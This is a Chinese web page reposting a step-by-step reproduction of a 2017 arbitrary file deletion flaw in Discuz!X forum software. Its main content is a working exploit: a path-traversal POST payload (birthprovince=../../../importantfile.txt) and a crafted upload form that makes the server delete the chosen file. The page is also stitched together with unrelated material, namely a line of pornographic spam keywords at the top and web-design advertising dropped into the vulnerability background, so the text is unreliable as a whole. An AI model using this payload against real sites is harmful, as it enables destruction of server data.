真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

Discuz!X前臺任意文件刪除漏洞重現(xiàn)

漏洞背景:
Discuz!X社區(qū)軟件,是一個采用 PHP 和 MySQL 等其他多種數(shù)據(jù)庫構(gòu)建的性能優(yōu)異、功能全面、安全穩(wěn)定的社區(qū)論壇平臺。

10余年的岳塘網(wǎng)站建設(shè)經(jīng)驗(yàn),針對設(shè)計(jì)、前端、開發(fā)、售后、文案、推廣等六對一服務(wù),響應(yīng)快,48小時及時工作處理。網(wǎng)絡(luò)營銷推廣的優(yōu)勢是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同,自動調(diào)整岳塘建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì),從而大程度地提升瀏覽體驗(yàn)。創(chuàng)新互聯(lián)建站從事“岳塘網(wǎng)站設(shè)計(jì)”,“岳塘網(wǎng)站推廣”以來,每個客戶項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。

2017年9月29日,Discuz!修復(fù)了一個安全問題用于加強(qiáng)安全性,這個漏洞會導(dǎo)致前臺用戶可以導(dǎo)致任意刪除文件漏洞。

2017年9月29日,知道創(chuàng)宇404 實(shí)驗(yàn)室開始應(yīng)急,經(jīng)過知道創(chuàng)宇404實(shí)驗(yàn)室分析確認(rèn),該漏洞于2014年6月被提交到 Wooyun漏洞平臺,Seebug漏洞平臺收錄了該漏洞,漏洞編號 ssvid-93588。該漏洞通過配置屬性值,導(dǎo)致任意文件刪除。

經(jīng)過分析確認(rèn),原有的利用方式已經(jīng)被修復(fù),添加了對屬性的 formtype 判斷,但修復(fù)方式不完全導(dǎo)致可以繞過,通過模擬文件上傳可以進(jìn)入其他 unlink 條件,實(shí)現(xiàn)任意文件刪除漏洞。

漏洞復(fù)現(xiàn):
1.進(jìn)入設(shè)置-個人資料,先在頁面源代碼找到formhash值,可以看到值為2599b5e5
Discuz!X前臺任意文件刪除漏洞重現(xiàn)
2.開啟一個插件Hackbar
Post數(shù)據(jù):birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5
Discuz!X前臺任意文件刪除漏洞重現(xiàn)
執(zhí)行后會顯示一片空白,你再刷新下或重新訪問下就好了。
Discuz!X前臺任意文件刪除漏洞重現(xiàn)
Discuz!X前臺任意文件刪除漏洞重現(xiàn)
3.出生地被修改成要刪除的文件。
最后構(gòu)造表單執(zhí)行刪除文件
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">





Discuz!X前臺任意文件刪除漏洞重現(xiàn)
生成.html,上面的需要自己修改。
4.然后隨便上傳一張圖片,就能刪除自己要刪除的。
Discuz!X前臺任意文件刪除漏洞重現(xiàn)
5.再訪問回去看一下。
Discuz!X前臺任意文件刪除漏洞重現(xiàn)
復(fù)現(xiàn)成功。


當(dāng)前標(biāo)題:Discuz!X前臺任意文件刪除漏洞重現(xiàn)
文章源于:http://weahome.cn/article/gigoop.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部